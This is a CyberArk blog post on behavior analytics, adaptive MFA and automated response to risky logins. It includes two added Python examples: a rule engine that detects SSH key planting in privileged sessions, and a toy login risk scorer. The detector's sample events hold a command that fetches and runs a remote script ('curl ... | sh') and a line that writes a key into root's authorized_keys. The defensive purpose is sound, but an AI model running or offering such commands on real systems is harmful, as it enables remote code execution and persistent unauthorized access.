Over six in 10 security decision-makers say their teams operate with limited visibility across their environments. Why? We could easily speculate that it comes down to the tools they do or don’t use. However, two-thirds of enterprises now have tools from up to 40 different security vendors in place, and they’re still struggling for insights into the constant cycle of identities seeking access.
I believe there’s a bigger-picture challenge we need to – and can – solve for.
In many ways, securing the workforce’s access to applications, devices and resources such as sensitive data is about being a constant observer of human behavior – and asking yourself the following questions in a perpetual loop:
- What are your users seeking to access and why?
- What actions are they trying to take with sensitive resources?
- Do the answers to those questions align with what is appropriate for the worker's role within the enterprise?
The problem is that you need immediate answers to these questions every time a user attempts to authenticate. And you need to know the answers for every user – across your ecosystem of employees and vendors, among others.
To get the visibility we need, the solution will come down to three variables: insights on user behavior, automated actions and integration enabling tools to share and act on data.
All Seeing, All Knowing – How to Observe and Secure Workforce Access Behavior
While various analytics tools have been on the market for a while, enterprise security teams need capabilities beyond simple feeds and dashboards. Today's threats call for a sophisticated user behavior analytics (UBA) engine serving as a centralized brain and nervous system – all-seeing, all-knowing.
Individual humans can’t independently maintain a real-time study of every user’s actions. Nor can they instantly infer a set of behavioral traits from the past that could indicate whether a person logging in is indeed that user – or an attacker. And yet, having that type of knowledge would be a game-changer.
This is where it helps to have a UBA engine capable of:
- Compiling and analyzing a historical log of user access behavior.
- Vetting access attempts in real time and autonomously detecting any signs of variation from typical behavior.
- Integrating with smart authentication tools – for example, adaptive multi-factor authentication (MFA) – to make automated decisions on handling any access attempt.
Let’s explore some scenarios in which such capabilities can help security teams make faster, smarter decisions that defend against attacks and support the business.
Scenario 1: Preventing Attacks – Anytime, Anywhere
Imagine a scenario in which an attacker steals a user’s password from a compromised website and figures out where the user works through LinkedIn. It’s 2:30 a.m.: the user and security team are sleeping, but the attacker is very much awake – testing out the password to see if it’s reused across enterprise apps storing sensitive data.
All the signals point to a threat, and here’s what the UBA and adaptive MFA would see: the log-in attempt is happening at a time when the employee is never active. It’s coming from a region the employee never travels to. What’s more, the IP address is atypical and the device is unfamiliar.
In this scenario, let's say the MFA is integrated with the UBA engine – and can relay insights about the log-in attempt to the UBA, like hands sending sensory information to the brain. In lockstep, the UBA weighs the signals against the actual user's history and scores the attempt as high risk. The UBA decides which actions to take, including:
- Adapting the log-in process to invoke stronger authentication challenges such as phishing-resistant secondary factors (e.g., FIDO2 hardware security keys) and knowing in which order to require them.
- Preventing access until the actual user can scan a unique QR code to approve access on their pre-enrolled mobile device.
How Else Can Automation and Integration Help?
Enterprises can also use automated, no-code workflows for continuous threat detection and response. Imagine another scenario where an attacker compromises a privileged user’s account.
In this instance, an automated workflow could detect a potentially malicious action – e.g., a new SSH key being created or installed in a privileged session – and alert your team via Slack. Through "if-then" logic, the workflow could automatically terminate the session and temporarily suspend the user's access while your team investigates. Or the workflow could move the user into a pre-defined high-risk user group with minimal access.
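The if-then workflow described above, worked through as an added example (not CyberArk's code): a small Python rule engine run over constructed privileged-session command events. It fires when a command creates or installs an SSH key inside a privileged session, then applies the remediation actions the text lists. The event format, the command patterns, the action names and the "high-risk" group are assumptions for illustration, and the Slack alert is represented as an appended notification record rather than a real API call.

```python
"""Automated if-then workflow over privileged-session events.

Added example, not CyberArk code. Watches a stream of session command
events for SSH key creation inside a privileged session and applies
remediation actions when a rule fires.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    session_id: str
    user: str
    privileged: bool   # session was opened through a privileged account
    command: str


# Commands that create or install an SSH key. Reads of authorized_keys do not
# match; only redirects or file tools that write into it do (assumed coverage).
SSH_KEY_PATTERNS = [
    re.compile(r"\bssh-keygen\b"),
    re.compile(r"\bssh-copy-id\b"),
    re.compile(r">>?\s*\S*authorized_keys\b"),
    re.compile(r"\b(tee|cp|mv)\b.*authorized_keys\b"),
]


def is_ssh_key_creation(e: Event) -> bool:
    """Condition: an SSH key is created or installed within a privileged session."""
    return e.privileged and any(p.search(e.command) for p in SSH_KEY_PATTERNS)


# Rules pair a condition with the actions to take. Action names are hypothetical.
RULES = [
    {
        "name": "ssh_key_created_in_privileged_session",
        "when": is_ssh_key_creation,
        "then": ["notify_slack", "terminate_session", "suspend_user",
                 "move_to_group:high-risk"],
    },
]


class Workflow:
    def __init__(self, rules):
        self.rules = rules
        self.notifications = []        # stands in for messages posted to Slack
        self.terminated_sessions = set()
        self.suspended_users = set()
        self.group_of = {}             # user -> access group after remediation

    def _apply(self, action: str, e: Event) -> None:
        if action == "notify_slack":
            self.notifications.append(f"[{e.session_id}] {e.user} ran: {e.command}")
        elif action == "terminate_session":
            self.terminated_sessions.add(e.session_id)
        elif action == "suspend_user":
            self.suspended_users.add(e.user)
        elif action.startswith("move_to_group:"):
            self.group_of[e.user] = action.split(":", 1)[1]
        else:
            raise ValueError(f"unknown action {action!r}")

    def run(self, events):
        """Evaluate every rule against every event; return the findings."""
        findings = []
        for e in events:
            if e.session_id in self.terminated_sessions:
                continue   # already remediated; later commands in it are not re-scored
            for rule in self.rules:
                if rule["when"](e):
                    for action in rule["then"]:
                        self._apply(action, e)
                    findings.append({"rule": rule["name"], "session": e.session_id,
                                     "user": e.user, "command": e.command})
        return findings


# Constructed session events: a benign read of authorized_keys, a write that
# plants a key, a follow-up command in the same (now terminated) session, an
# unprivileged key generation, and a privileged ssh-copy-id.
EVENTS = [
    Event("s1", "alice", True, "sudo systemctl restart nginx"),
    Event("s1", "alice", True, "cat /root/.ssh/authorized_keys"),
    Event("s1", "alice", True,
          "echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIexamplekey' >> /root/.ssh/authorized_keys"),
    Event("s1", "alice", True, "curl http://192.0.2.9/run.sh | sh"),
    Event("s2", "bob", False, "ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519"),
    Event("s3", "carol", True, "ssh-copy-id deploy@192.0.2.20"),
]


def run_demo():
    """Run the workflow over the constructed events; return (workflow, findings)."""
    wf = Workflow(RULES)
    findings = wf.run(EVENTS)
    return wf, findings


if __name__ == "__main__":
    wf, findings = run_demo()
    for f in findings:
        print(f)
    print("suspended:", sorted(wf.suspended_users), "groups:", wf.group_of)
```

Two details matter in practice: the condition only fires in privileged sessions, so bob's routine `ssh-keygen` in an unprivileged session is left alone, and the patterns distinguish writing to `authorized_keys` from merely reading it, which keeps the Slack channel from filling with false positives while the team investigates the genuine hits.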
Scenarios like the ones we’ve highlighted here are a win for organizations looking to build toward a security-first approach to workforce access. They’re also a win for security leaders seeking ways to operate more efficiently. With capabilities from UBA, adaptive MFA and automated workflows, securing access can involve fewer work hours, staff and costs.
And with the right capabilities, these insights can be at a security admin’s fingertips – providing the ability to drill down into details, including every factor that influenced the automated decision.
Scenario 2: Improving Productivity and User Experience
We’ll continue with another example: an employee working late on a cross-country flight. The stakes: she’s putting the final touches on a product launch essential for improving the customer experience.
Her laptop is open. WiFi is on. SSO accepts her password. Next up: MFA to get into a collaboration app where she’s managing the project. Here, frictionless UX is essential; the employee is on deadline. But you can’t put security on the back burner: The same web applications your users need to access are also the No. 1 attack vector in eight out of 10 incidents. In this in-flight scenario, a context-aware MFA/UBA combo would see that the log-in attempt is coming:
1. From a pre-approved, enrolled device.
2. On a typical weekday (a usual workday for her).
3. At her regular working hours.
4. From a region her user history shows she travels to and from regularly.
Of course, visibility is best when paired with automated capabilities to act upon what’s seen. The dynamic duo of UBA and adaptive MFA can apply contextual insights to make a decision. In this low-risk case, the UBA can determine that secondary authentication isn’t necessary and allow the user to access the application – without compromising security.
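Both scenarios above (the 2:30 a.m. attempt with a stolen password and the in-flight login), worked through as an added example that is not CyberArk's code: a Python routine that builds per-user frequency tables from a constructed login history, scores a new attempt on the signals the text names (hour, weekday, country, network, device) and maps the score to allow, step-up or block. The signal weights, the decision thresholds, the 5% rarity cutoff and the login history are hypothetical tuning and data, not values from the page.

```python
"""Toy user behavior analytics (UBA) risk scoring for login attempts.

Added example, not CyberArk code. Builds a per-user baseline from a
constructed login history, scores a new attempt against it, and maps the
score to an adaptive-MFA decision: allow, step up, or block.
"""
from collections import Counter
from dataclasses import dataclass
import ipaddress


@dataclass(frozen=True)
class Attempt:
    user: str
    hour: int        # local hour of the attempt, 0-23
    weekday: int     # 0 = Monday ... 6 = Sunday
    country: str     # country code from IP geolocation
    ip: str
    device_id: str   # identifier presented by the device


# Hypothetical signal weights (sum to 100) and rarity cutoff.
WEIGHTS = {"hour": 20, "weekday": 10, "country": 30, "network": 15, "device": 25}
RARE_FRACTION = 0.05   # a value seen in < 5% of past logins counts as atypical


def network_of(ip: str) -> str:
    """Collapse an IP to its /24 so a re-assigned office address still matches."""
    return str(ipaddress.ip_network(f"{ip}/24", strict=False))


class Baseline:
    """Per-user frequency tables built from historical successful logins."""

    def __init__(self, history):
        self.n = len(history)
        self.hours = Counter(a.hour for a in history)
        self.weekdays = Counter(a.weekday for a in history)
        self.countries = Counter(a.country for a in history)
        self.networks = Counter(network_of(a.ip) for a in history)
        self.devices = {a.device_id for a in history}

    def _rare(self, counter, key) -> bool:
        if self.n == 0:
            return True          # no history at all: treat every signal as new
        return counter[key] / self.n < RARE_FRACTION

    def score(self, a: Attempt):
        """Return (risk_score, contributing_signals) for an attempt."""
        reasons = []
        if self._rare(self.hours, a.hour):
            reasons.append("hour")
        if self._rare(self.weekdays, a.weekday):
            reasons.append("weekday")
        if self._rare(self.countries, a.country):
            reasons.append("country")
        if self._rare(self.networks, network_of(a.ip)):
            reasons.append("network")
        if a.device_id not in self.devices:
            reasons.append("device")
        return sum(WEIGHTS[r] for r in reasons), reasons


def decide(score: int) -> str:
    """Map a risk score to an adaptive-MFA action (hypothetical thresholds)."""
    if score >= 60:
        return "block_pending_out_of_band_approval"
    if score >= 25:
        return "step_up_phishing_resistant_factor"
    return "allow"


def build_history():
    """Constructed history: weekday office-hours logins from the US on two
    enrolled devices, plus regular trips to Canada on the laptop."""
    history = []
    for weekday in range(5):
        for hour in range(9, 18):
            device = "laptop-1" if hour % 2 else "phone-1"
            history.append(Attempt("alice", hour, weekday, "US",
                                   f"203.0.113.{len(history) + 1}", device))
    for i, hour in enumerate(range(10, 15)):
        history.append(Attempt("alice", hour, 1, "CA", f"198.18.0.{10 + i}", "laptop-1"))
    return history


BASELINE = Baseline(build_history())

# Scenario 1 (constructed): 2:30 a.m., unseen country, network and device.
ATTACK = Attempt("alice", 2, 2, "AU", "198.51.100.7", "unknown-device")
# Scenario 2 (constructed): in-flight login at a usual hour from the enrolled
# laptop; only the Wi-Fi network is new.
IN_FLIGHT = Attempt("alice", 17, 3, "CA", "192.0.2.44", "laptop-1")


def evaluate(attempt: Attempt) -> dict:
    """Score an attempt and return the decision with the factors behind it."""
    score, reasons = BASELINE.score(attempt)
    return {"score": score, "reasons": reasons, "decision": decide(score)}


if __name__ == "__main__":
    for name, attempt in (("attack", ATTACK), ("in_flight", IN_FLIGHT)):
        print(name, evaluate(attempt))
```

Returning the list of contributing signals alongside the score is what lets an admin drill down into every factor behind an automated decision. A single unfamiliar network, as in the in-flight case, stays below the step-up threshold on its own, while the stacked anomalies of the night-time attempt push it straight to a block. In production the baseline would be rebuilt continuously from authentication logs rather than constructed inline.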
The outcome: the employee authenticates safely and efficiently, completing her project on deadline. And this is a win for her company’s security team’s ability to show that security-first access can be an enabler rather than a barrier to progress.
Embracing and Effecting Change in Securing Today’s Workforce
Visibility is the first step in making smarter decisions regarding workforce access. Automation can help your team do more. With the proper controls and capabilities – built into an integrated approach that brings tools together to share and act on data – you can significantly improve your security posture and support the business.
For more insights on how you can secure your organization from identity-related threats, check out this video from CyberArk experts on what capabilities are needed to balance securing the workforce and ensuring productivity.
Gil Rapaport is the general manager for Identity and Access at CyberArk.